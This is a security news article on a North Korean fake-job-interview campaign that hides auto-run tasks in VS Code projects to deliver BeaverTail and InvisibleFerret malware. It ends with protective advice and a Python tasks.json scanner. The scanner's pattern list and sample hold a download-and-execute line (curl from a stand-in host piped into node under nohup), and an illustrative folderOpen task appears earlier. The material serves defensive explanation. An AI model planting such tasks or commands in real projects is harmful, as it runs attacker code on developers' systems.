North Korean Hackers Abuse VS Code Projects to Deploy Stealthy Backdoors
North Korean threat actors linked to the Contagious Interview campaign are using malicious VS Code projects to deploy backdoors, steal data, and gain remote access to developer systems.
North Korean state-sponsored threat actors associated with the long-running Contagious Interview campaign have once again evolved their attack techniques by abusing Microsoft Visual Studio Code (VS Code) projects to deliver stealthy backdoors on developer systems.
Security researchers from Jamf Threat Labs revealed that attackers are now embedding malicious commands inside VS Code task configuration files, a technique first observed in December 2025 and continuously refined since then.
Fake Job Interviews as an Entry Point
The attack typically begins with a fake job interview or coding test. Victims—mostly software developers—are instructed to clone a repository from platforms such as GitHub, GitLab, or Bitbucket and open it in VS Code.
When the folder is opened, VS Code's Workspace Trust prompt asks whether to trust the repository's authors. In Restricted Mode (trust declined) tasks do not run at all. If the user grants trust, VS Code reads .vscode/tasks.json and, unless the task.allowAutomaticTasks setting is "off", launches any task marked to run on folder open; a task's command is an arbitrary shell command, so trusting the folder is equivalent to running whatever the repository author put there.
Abuse of VS Code Tasks
The attackers configure a task with "runOn": "folderOpen" in its runOptions, so the command executes every time the project folder is opened in a trusted window, with no click or build step required. The task fetches obfuscated JavaScript payloads from attacker-controlled domains hosted on Vercel.
If the remote payload cannot be downloaded, the task falls back to JavaScript embedded in the repository and disguised as harmless dictionary files, so execution continues even when the download fails.
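The task shape the campaign relies on, as a constructed illustration (added here, not from Jamf's report or any real repository; the label and the harmless echo command are placeholders for the attacker's download-and-execute pipeline):

```jsonc
// .vscode/tasks.json in the cloned repository
{
    "version": "2.0.0",
    "tasks": [
        {
            "label": "Prepare workspace",
            "type": "shell",
            "command": "echo 'this ran automatically when the folder was opened'",
            // runOn: folderOpen makes VS Code launch the task as soon as the folder is opened
            "runOptions": { "runOn": "folderOpen" },
            // keeping the terminal panel hidden keeps the execution out of sight
            "presentation": { "reveal": "never", "echo": false }
        }
    ]
}
```

In a trusted workspace this task runs at folder open unless task.allowAutomaticTasks is set to "off" in user settings; in Restricted Mode it does not run. The command field is an ordinary shell command, which is why a curl-to-node pipeline fits there without any further trick.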
Malware Payloads: BeaverTail & InvisibleFerret
Once executed, the payload deploys two malware families:
- BeaverTail – a Node.js-based backdoor enabling remote code execution
- InvisibleFerret – a Python-based second-stage malware for persistence, data theft, and cryptocurrency mining
On macOS, the task detaches the payload from the IDE with nohup: a background bash command uses curl to fetch the JavaScript and pipes it straight into the Node.js runtime without first saving a script file, so the process keeps running even after VS Code is closed.
Advanced Capabilities
The malware is capable of:
- System fingerprinting
- Continuous communication with a remote server
- Keystroke logging
- Screenshot capture
- Browser credential theft
- Clipboard cryptocurrency wallet replacement
- Deploying XMRig crypto miners
- Installing AnyDesk for remote access
In some cases, additional payloads executed within minutes of the initial infection, beaconing to the remote server every few seconds and erasing their traces on command.
Who Is Being Targeted?
These attacks mainly target developers working in cryptocurrency, blockchain, and fintech sectors, as they often have privileged access to sensitive systems, digital wallets, and source code.
How to Stay Protected
Security experts advise developers to:
- Do not grant Workspace Trust to repositories from unknown sources; open them in Restricted Mode first
- Review .vscode/tasks.json (and any other .vscode configuration files) before trusting a project, looking for tasks with "runOn": "folderOpen" and for commands that download or execute code
- Set task.allowAutomaticTasks to "off" in user settings so that no task runs at folder open without an explicit action
- Install only verified npm packages
- Be cautious during interview coding tests, especially when asked to clone and open an unfamiliar repository
- Use endpoint protection and monitoring tools, and watch for node, curl, or nohup processes spawned by VS Code
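A way to make the "review tasks.json" step mechanical, as an added example rather than anything from the page or from Jamf Threat Labs: the script below parses a repository's .vscode/tasks.json (which is JSONC, so comments and trailing commas must be stripped before json.loads will accept it) and reports every task that auto-runs on folder open or whose command contains download-and-execute tokens. The embedded tasks.json, its task labels and the example.invalid URL are constructed; the token list is an assumption to start from, not the campaign's indicators.

```python
"""Review a VS Code tasks.json for auto-run tasks and download-and-execute commands.

Added example (not code from the article or from Jamf Threat Labs). The sample
tasks.json, its task labels and the example.invalid URL are constructed.
"""
import json
import re
import sys

AUTO_RUN_VALUE = "folderOpen"  # runOptions.runOn value that launches a task at folder open

# Tokens that warrant a human look before a project is trusted (an assumption,
# not the campaign's indicators; tune for your environment).
SUSPICIOUS_PATTERNS = [
    r"\bcurl\b", r"\bwget\b", r"\bnohup\b", r"\bnode\s+-e\b", r"\|\s*node\b",
    r"\|\s*(ba)?sh\b", r"\bbase64\b", r"\beval\b", r"\bInvoke-Expression\b", r"\biex\b",
]


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments outside strings, then trailing commas, so json.loads accepts it."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep the escaped character, e.g. \" inside a string
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):       # line comment: skip up to (not including) the newline
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):       # block comment
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    # Trailing commas before } or ] (simplification: a string literal ending in ",}" would also match)
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def collect_command(task: dict) -> str:
    """Join command and args, including per-OS overrides (windows/osx/linux), into one string."""
    pieces = []
    for scope in (task, task.get("windows"), task.get("osx"), task.get("linux")):
        if not isinstance(scope, dict):
            continue
        cmd = scope.get("command")
        if isinstance(cmd, str):
            pieces.append(cmd)
        elif isinstance(cmd, dict) and isinstance(cmd.get("value"), str):
            pieces.append(cmd["value"])
        for arg in scope.get("args") or []:
            if isinstance(arg, str):
                pieces.append(arg)
            elif isinstance(arg, dict) and isinstance(arg.get("value"), str):
                pieces.append(arg["value"])
    return " ".join(pieces)


def scan_tasks_json(text: str) -> list:
    """Return one finding per task that auto-runs on folder open or matches a suspicious token."""
    doc = json.loads(strip_jsonc(text))
    findings = []
    for task in doc.get("tasks", []):
        if not isinstance(task, dict):
            continue
        run_on = (task.get("runOptions") or {}).get("runOn")
        cmd = collect_command(task)
        hits = [p for p in SUSPICIOUS_PATTERNS if re.search(p, cmd, re.IGNORECASE)]
        if run_on == AUTO_RUN_VALUE or hits:
            findings.append({
                "label": task.get("label", "<unnamed>"),
                "auto_run": run_on == AUTO_RUN_VALUE,
                "suspicious": hits,
                "command": cmd,
            })
    return findings


# Constructed sample: one benign task and one shaped like the abuse described in the article.
SAMPLE_TASKS_JSON = r'''{
    // comments and trailing commas are legal in VS Code's tasks.json
    "version": "2.0.0",
    "tasks": [
        { "label": "build", "type": "shell", "command": "npm run build", },
        {
            "label": "Prepare workspace",
            "type": "shell",
            "command": "nohup bash -c \"curl -fsSL https://example.invalid/dict.json | node\" >/dev/null 2>&1 &",
            "runOptions": { "runOn": "folderOpen" },
            "presentation": { "reveal": "never" },
        },
    ]
}'''

if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_TASKS_JSON
    for f in scan_tasks_json(text):
        flags = ["auto-run on folderOpen"] if f["auto_run"] else []
        flags += [f"matches {p}" for p in f["suspicious"]]
        print(f"[REVIEW] task {f['label']!r}: {'; '.join(flags)}\n         command: {f['command']}")
```

Run it as `python scan_tasks.py path/to/repo/.vscode/tasks.json` before clicking "Trust" on a cloned project; with no argument it scans the built-in sample, where only the "Prepare workspace" task is reported (auto-run plus the curl, nohup and pipe-to-node tokens). Anything it flags deserves a read of the actual command, and a folderOpen task in a repository you were handed for an interview is reason enough not to trust the workspace.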
Final Thoughts
This campaign highlights how trusted developer tools like VS Code can be weaponized by advanced persistent threat (APT) groups. As threat actors continue to adapt rapidly, developer awareness and caution remain the strongest defense.